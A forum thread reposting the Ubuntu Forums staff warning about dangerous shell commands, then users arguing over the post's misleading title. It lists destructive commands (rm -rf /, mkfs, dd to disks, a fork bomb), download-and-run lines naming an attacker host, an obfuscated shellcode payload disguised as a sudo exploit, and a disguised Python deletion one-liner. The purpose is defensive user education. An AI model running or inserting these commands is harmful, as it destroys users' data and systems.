Ubuntu users alert..malicious code on prowl..

[naveen_reloaded]

ATTENTION ALL USERS:
Malicious Commands




I'd like to take a moment of
your time to discuss a recent
disturbing trend the staff has
been noticing on the forums,
and also take this as an
opportunity to raise awareness
of this situation through
education.

We've recently had an
increase in the number of
dangerous commands being
posted on the forums. Don't
pretend you don't know what I
mean -- commands that cause
massive damage or disruption
to the user's computer.

I'd just like to caution those
thinking of doing this that
UbuntuForums has a strict
zero-tolerance policy when it
comes to posting dangerous
commands . If you post one of
them, particularly in a support
thread disguised as advice,
expect to be instantly and
permanently BANNED , at the
account, e-mail, IP, or ISP
level. I do not care about
intent -- if you mean it as a
joke, it is not funny. If you
mean it as a lesson, go teach
it somewhere else. This
behavior is absolutely against
the Forum Guidelines and
Ubuntu Code of Conduct.

I'd also like to remind users to
be cautious when someone
tells you to run some
command or download some
script as a solution to your
problem. When in doubt as to
the safety of the procedure,
it's always a good idea to wait
for more opinions, and/or have
the command explained to you
and verify if the explanation
makes sense by consulting
readily available
documentation on Linux
commands (such as
manpages). No matter how
hard we try to stay on top of
all posts in realtime, we are
not perfect.

Regards,

The UbuntuForums Staff.

As requested by some, for the
education of our users, here
are some common examples
of dangerous commands that
should raise a bright red flag.
Again, these are extremely
dangerous and should not be
attempted on a computer that
has any physical connection to
valuable data -- many of them
will even cause damage from
a LiveCD environment.

Again, DANGEROUS
COMMANDS -- look but DO
NOT RUN .

Also, this is far from an
exhaustive list , but should give
you some clues as to what
kind of things people may try
to trick you into doing.
Remember this can always be
disguised in an obfuscated
command or as a part of a
long procedure, so the bottom
line is take caution for
yourself when something just
doesn't "feel right".

Delete all files, delete current
directory, and delete visible
files in current directory. It's
quite obvious why these
commands can be dangerous
to execute.

Code:



rm -rf / rm -rf. rm -rf *



Reformat: Data on device
mentioned after the mkfs
command will be destroyed
and replaced with a blank
filesystem.

Code:



mkfs mkfs.ext3 mkfs.anything



Block device manipulation:
Causes raw data to be written
to a block device. Often times
this will clobber the filesystem
and cause total loss of data:

Code:



any_command > /dev/sda dd
if=something of=/dev/sda



Forkbomb: Executes a huge
number of processes until
system freezes, forcing you to
do a hard reset which may
cause corruption, data
damage, or other awful fates.

In Bourne-ish shells, like Bash:
(This thing looks really
intriguing and curiousity
provokes)

Code:



){:&};:



In Perl

Code:



fork while fork



Tarbomb: Someone asks you
to extract a tar archive into an
existing directory. This tar
archive can be crafted to
explode into a million files, or
inject files into the system by
guessing filenames. You
should make the habit of
decompressing tars inside a
cleanly made directory

Decompression bomb:
Someone asks you to extract
an archive which appears to
be a small download. In reality
it's highly compressed data
and will inflate to hundreds of
GB's, filling your hard drive.
You should not touch data
from an untrusted source

Shellscript: Someone gives you
the link to a shellscript to
execute. This can contain any
command he chooses -- benign
or malevolent. Do not execute
code from people you don't
trust

Code:



wget
http://some_place/some_file
sh./some_file



Code:

wget
http://some_place/some_file -
O- | sh



Compiling code: Someone
gives you source code then
tells you to compile it. It is
easy to hide malicious code as
a part of a large wad of
source code, and source code
gives the attacker a lot more
creativity for disguising
malicious payloads. Do not
compile OR execute the
compiled code unless the
source is of some well-known
application, obtained from a
reputable site (i.e.
SourceForge, the author's
homepage, an Ubuntu
address).

A famous example of this
surfaced on a mailing list
disguised as a proof of concept
sudo exploit claiming that if
you run it, sudo grants you
root without a shell. In it was
this payload:

Code:



char esp[] __attribute__
((section(".text"))) /* e.s.p
release */ = "\xeb\x3 e\x5
b\x31 \xc0 \x50 \x54 \x5 a\x83
\xec\x64 \x68 "
"\xff\xff\xff\xff\x68 \xdf\xd0
\xdf\xd9 \x68 \x8 d\x99 "
"\xdf\x81 \x68 \x8 d\x92 \xdf\xd2
\x54 \x5 e\xf7 \x16 \xf7" "\x56
\x04 \xf7 \x56 \x08 \xf7 \x56 \x0
c\x83 \xc4 \x74 \x56 " "\x8 d\x73
\x08 \x56 \x53 \x54 \x59 \xb0 \x0
b\xcd\x80 \x31 " "\xc0 \x40
\xeb\xf9 \xe8 \xbd\xff\xff\xff\x2
f\x62 \x69 " "\x6 e\x2 f\x73 \x68
\x00 \x2 d\x63 \x00 " "cp -p
/bin/sh /tmp/.beyond; chmod
4755 /tmp/.beyond;";


For more detail visit http://www.ubuntuforums.org/announcement.php?a=54

[praka123]

LOL! do u think this is a news?what malicious i cant find any
frustration of a virus bloated windows user!
yes.indeed command line is the power house and root/sudo is needed for something to "work".that's why no viruses even if popularity increases for Linux also no viruses are able to destruct.only worms which can corrupt elf binary exists.
and this sucks.u directly posted these commands for making some BAD news reg Linux due to ur winboyness .mind edit/remove those commands.post the basic things and ubuntuforums.org link.
this is what sarcastic about Vista boys,they want to defame Linux and FOSS,and ofcourse Mac OS X BS!
warning:No Linux user esp windows converts try those commands!

[cool_techie_tvm]

Well thanks for the info, ubuntu n00b in here

[naveen_reloaded]

I just wanted to warn others..
Why are yöü soo irritated..cant stand a news against ubuntu?

[praka123]

if i post a tip running "cmd" to delete ur partition,do u feel for it?
there is nothing special in this case.this is made a news thx to Vista sucks news circulating!

[cool_techie_tvm]

Here is the official link to that announcement http://ubuntuforums.org/announcement.php?f=73

Its pretty much readable (no offense naveen_reloaded)

[ray|raven]

Malicious code on the prowl?Lolz.
Dude, you better change the title.Its very misleading.
That announcement in the ubuntu forums was posted as a warning to newbies to stop them from running every darn command posted.

U talk as if there's a virus attacking every ubuntu system out there.
it's like saying running format c:\ will erase everything on c drive so format is a mailicious tool.

Oh and please format that post.
It looks very bad.

Reported for misleading title/post.

Regards,
ray

[praka123]

well said rayraven!I got very much angry first when he posted this as some thing big fault! well for truth,shell opens ur Linux box,but posting this here as a vulnerability is irritating.I think he dont know what shell means.

these are few samples shown.and to prevent this FUD from Vista boy,I urge users to read:

Quote:

One of the most common questions I hear new Linux users ask is "What program should I use for virus protection?" Many of them lose faith in me as a source of security information when I reply, "None." But you really don't need to fear malware on your new platform, thanks to the way Linux is built.
Savvy Windows users have to watch their virus checkers as closely as the head nurse in the ICU keeps an eye on patient monitors. Often, the buzz in the Windows security world is about which protection-for-profit firm was the first to discover and offer protection for the malware du jour -- or should I say malware de l'heure? The only thing better than having backed the winning Super Bowl team come Monday morning at the office coffeepot is having the virus checker you use be the one winning the malware sweepstakes that weekend.

If a rogue program finds a crack in your Windows armor, paying $200 per infection to have your machine scrubbed and sanitized by the local goon^H^H^H^H geek squad not only helps to reinforce the notion that you have to have malware protection, but that it has to be the right protection, too. The malware firms are aware of this, and all of their advertising plays upon the insecurity fears of Windows users and the paranoia that results. Chronic exposure and vulnerability to malware has conditioned Windows users to accept this security tax.

It's no wonder, then, that when Windows users are finally able to break their chains and experience freedom on a Linux desktop, they stare at me in disbelief when I tell them to lay that burden down. They are reluctant to stop totin' that load. They have come to expect to pay a toll for a modicum of security.

I try to explain that permissions on Linux make such tribute unnecessary. Without quibbling over the definitions of viruses and trojans, I tell them that neither can execute on your machine unless you explicitly give them permission to do so.

read the full article

[infra_red_dude]

Hey guys, don't get mad at Naveen. He's only posted something which will be useful to all Linux noobs. Just that the title was misleading.

@Naveen
Thanks for posting it here Kindly contact the mods and change the thread title to - "Warning: Linux users, do not try these commands"

[ray|raven]

@praka123
Nice link mate.A Must read for all new linux users.
Especially this part IMO.

Quote:

Linux users, like users on every operating system, must always be aware of security issues. They must act intelligently to keep their systems safe and secure. They should not run programs with root privileges when they are not required, and they should apply security patches regularly.

Misleading claims and false advertising by virus protection rackets to the contrary, you simply don't need antivirus products to keep your Linux box free of malware.

Regards,
ray

[praka123]

BTW,I am not a fan of "sudo" anyway.sudo is there for n00bish users that Ubuntu uses it.I prefer a root login or "su -" anytime.it is better Debian defaults to su.

[naveen_reloaded]

Well since i am posting from my mobile,if anybody is using from mobile knows how difficult to post a thread thru mobile.
Ya title may be misleading,why take that way?instead let it be a warning to all.,
Ok if any mod is out there please change the title.


I posted not to offend any ubuntu user..i just posted so that not so techie linux users..can get benefit.
Ya vista is good,when compared to this horrifying commands even regular users have fallen to.
It that manner vista is very good.
Atleast we dont need to bother about keyboard to make one thing work.

@infra red dude

Thanks for supporting and understanding what i did

[Gigacore]

offtopic: hey naveen, why is all ur recent posts NARROW ???

[naveen_reloaded]

Coz i am typing from mobile ..opera mini.
Dont know why.
May be its causing it...
Dont know really.

[Faun]

lol..i thought it was something related to security breach.

already bookmarked it a week before.
Btw u went to ubuntu forums just to post this here ?

lot of these are well known to linux users.

formatting of text is screwed up.

[praka123]

^that's what i also thought! pretty difficult to see it as a help for ubuntu users!rather the title suggests that Ubuntu is like Vista wtf

[NucleusKore]

Looks like I'm late
Yes the title is very misleading, please change it. And I think you can edit your post and fix the formatting from a pc, its too longish.
As Praka et al have pointed out, there are "dangerous" commands in Windows too

[naveen_reloaded]

Its not possible to change to title from the edit guys.only MODS can change it.

[Ecko]

The following commands can cause massive damage to your Ubuntu operating system! Please DO NOT execute any of them, just read and learn!

CODE

sudo rm -rf / (This will delete all your files on your system) - Needs administrator rights!
sudo rm -rf . (This will delete the current directory your in) - Needs administrator rights!
sudo rm -rf * (This will delete all the files in the current folder) - Needs administrator rights!
rm -rf * or rm -rf *.* (This will delete all the files in the current folder) - No administrator rights needed!
rm -rf ~ / & (This will destroy your home directory) - No administrator rights needed!


All the below commands will erase your hard drive!

CODE

sudo mkfs (This will format your hard drive) - Needs administrator rights!
sudo mkfs.ext3 (This will format your hard drive) - Needs administrator rights!
sudo mkfs.bfs (This will format your hard drive) - Needs administrator rights!
sudo mkfs.cramfs (This will format your hard drive) - No administrator rights needed!
sudo mkfs.ext2 (This will format your hard drive) - Needs administrator rights!
sudo mkfs.minix (This will format your hard drive) - Needs administrator rights!
sudo mkfs.msdos (This will format your hard drive) - Needs administrator rights!
sudo mkfs.reiserfs (This will format your hard drive) - Needs administrator rights!
sudo mkfs.vfat (This will format your hard drive) - Needs administrator rights!


The dd command can be very dangerous, especially when you have no idea what it does! Below are some examples, but remember that these can vary often!

CODE

sudo dd if=/dev/zero of=/dev/hda (VERY DANGEROUS COMMAND! It will zero out the whole primary IDE hard drive) (Needs administrator rights)
sudo dd if=/dev/hda of=/dev/hdb (Needs administrator rights)
sudo dd if=something of=/dev/hda (Needs administrator rights)


WARNING: /dev/hda and /dev/hdb from the above example can be replaced with /dev/sda or /dev/sdb or any partition or hard drive you may have on your system!

Block device manipulation: Causes raw data to be written to a block device. Often times this will clobber the filesystem and cause total loss of data!

CODE

any_command > /dev/sda
dd if=something of=/dev/sda


Forkbomb: Executes a huge number of processes until system freezes, forcing you to do a hard reset which may cause corruption, data damage, or other awful fates!

The below command looks really intriguing and curiosity may lead new and inexperienced users to execute it! DON'T EXECUTE THEM!

CODE

){:&};:


CODE

fork while fork


Tarbomb: Someone asks you to extract a tar archive into an existing directory. This tar archive can be crafted to explode into a million files, or inject files into the system by guessing filenames. You should make the habit of decompressing tars inside a cleanly made directory!

Decompression bomb: Someone asks you to extract an archive which appears to be a small download. In reality it's highly compressed data and will inflate to hundreds of GBs, filling your hard drive. You should not touch data from an untrusted source!

Shellscript: Someone gives you the link to a shellscript to execute. This can contain any command he chooses -- benign or malevolent. Do not execute code from people you don't trust!

CODE

wget http://some_place/some_file
sh ./some_file

Example: wget http://hax018r.org/malicious-script
sh ./malicious-script


or

CODE

wget http://some_place/some_file -O- | sh

Example: wget http://hax018r.org/malicious-script -O- | sh


WARNING: Remember that the above examples can have any name!

Compiling code: Someone gives you a source code then tells you to compile it. It is easy to hide malicious code as a part of a large wad of source code, and source code gives the attacker a lot more creativity for disguising malicious payloads. Do not compile OR execute the compiled code unless the source is of some well-known application, obtained from a reputable site (i.e. Softpedia, SourceForge, Freshmeat, the author's homepage, an Ubuntu address).

A famous example of this surfaced on a mailing list disguised as a proof of concept sudo exploit claiming that if you run it, sudo grants you root without a shell. There was this payload:

CODE

char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "xebx3ex5bx31xc0x50x54x5ax83xecx64x68"
"xffxffxffxffx68xdfxd0xdfxd9x68x8dx99"
"xdfx81x68x8dx92xdfxd2x54x5exf7x16xf7"
"x56x04xf7x56x08xf7x56x0cx83xc4x74x56"
"x8dx73x08x56x53x54x59xb0x0bxcdx80x31"
"xc0x40xebxf9xe8xbdxffxffxffx2fx62x69"
"x6ex2fx73x68x00x2dx63x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";


To the new and inexperienced computer user, this looks like the "hex code gibberish stuff" that is so typical of a safe proof-of-concept. However, this actually runs rm -rf ~ / & which will destroy your home directory as a regular user, or all files as root. If you could see this command in the hex string, then you don't need to be reading this announcement. Otherwise, remember that these things can come in very novel forms. Watch out!

Here's another example of code that should definitely NOT be executed by anyone!

CODE

python -c 'import os; os.system("".join([chr(ord(i)-1) for i in "sn!.sg!+"]))'


Where "sn!.sg!+" is simply rm -rf * shifted a character up.

In conclusion, all new and inexperienced users who want to learn Ubuntu should start learning the above commands first and what they can do to your system.

Credits: Some of the above examples of malicious code were taken from the Ubuntu Forums announcement.

[cool_techie_tvm]

Guess what, this has even made it to the front page of digg !!

http://www.digg.com/linux_unix/Ubunt...ommand_Warning

[Faun]

Quote:

Originally Posted by cool_techie_tvm

Guess what, this has even made it to the front page of digg !!

http://www.digg.com/linux_unix/Ubunt...ommand_Warning

lol...digg it man

[Sykora]

@praka et al : Why is everyone bashing naveen? IMO this is one of the most important pieces of advice one can give to new linux user.It tells them that Linux is secure enough that the only way the system will crash is if you do something stupid -- the point remains that it can still be crashed, so watch out.

Good post, but I'm surprised it took so long for people to start (both posting malicious code, and noticing that it was being posted).

[NucleusKore]

@Sykora....look at the thread title
"Ubuntu users alert..malicious code on prowl.."
I was expecting a vulnerability as in a virus when I opened this thread.
Yes the commands are dangerous but it could have been presented more accurately. Its more like don't openly trust anyone you meet on any forum, no offence meant to any fresh stock here, but its a precaution you take on ANY forum, not necessarily computing.

Also note there is a difference between dangerous and malicious. Format in Windows can be a dangerous command if you do not know what you are doing, BUT IT IS NOT MALICIOUS.

[preshit.net]

Absolutely. Although I really appreciate the OP for the article/post, the title chosen is totally misleading.

No MODS reading this ehh ?

Btw, praka, Nice article there

[Sykora]

@NucleusKore : So if I gave you the source code for a virus, it would no longer be malicious?

I admit the title is _slightly_ off, but certainly not so much to get offended or irritated. At least the title is controversial enough to get everyone to take a look at the thread

[naveen_reloaded]

^well said.
First i too thought have a created a worst title.
To say the truth i just copied and pasted just like any other news being submitted here.that too i am doing from mobile,its kinda difficult.
Kindly understand.i just want people to know about these command so that they wont fall for any naughty work of hackers through mail and other stuffs.yes i do agree that linux has got least or no virus...but let me ask..how many of the linux users are well versed with all these commands?
I dont think so many will know.

I that case..atleast many will come to know what these codes are and how they can be harmfull.

Others who are irritated and versed people of ubuntu can go to other thread and reply...
I had no intention of flaming on ubuntu users..i dont know why prak is so irritated...dont worryy dude many things like this are yet to hit net once your ubuntu becomes popular.

Until then your so called vista fanboy like me can atleast have a happy days not worrying about ,how to remember the idiotic commands...which i think only dev should know and bang their heads with...not me..
I didnt start it.yöü did it.
Thanks anyway..

[NucleusKore]

Quote:

Originally Posted by Sykora

@NucleusKore : So if I gave you the source code for a virus, it would no longer be malicious?

Is format in windows cli a virus?

I think I made myself quite clear earlier

[Faun]

i can make a virus, its damn easy:
1) create a .bat file
2) name it XXX.mpg.bat
3) write inside format c:
4) echo u r a dumb addict

done man, yeah it was that easy..lol
wait:
soon a patch willl be coming from MS to correct this malicious code

[NucleusKore]

Yes it better come soon

[praka123]

Lol! :d @t159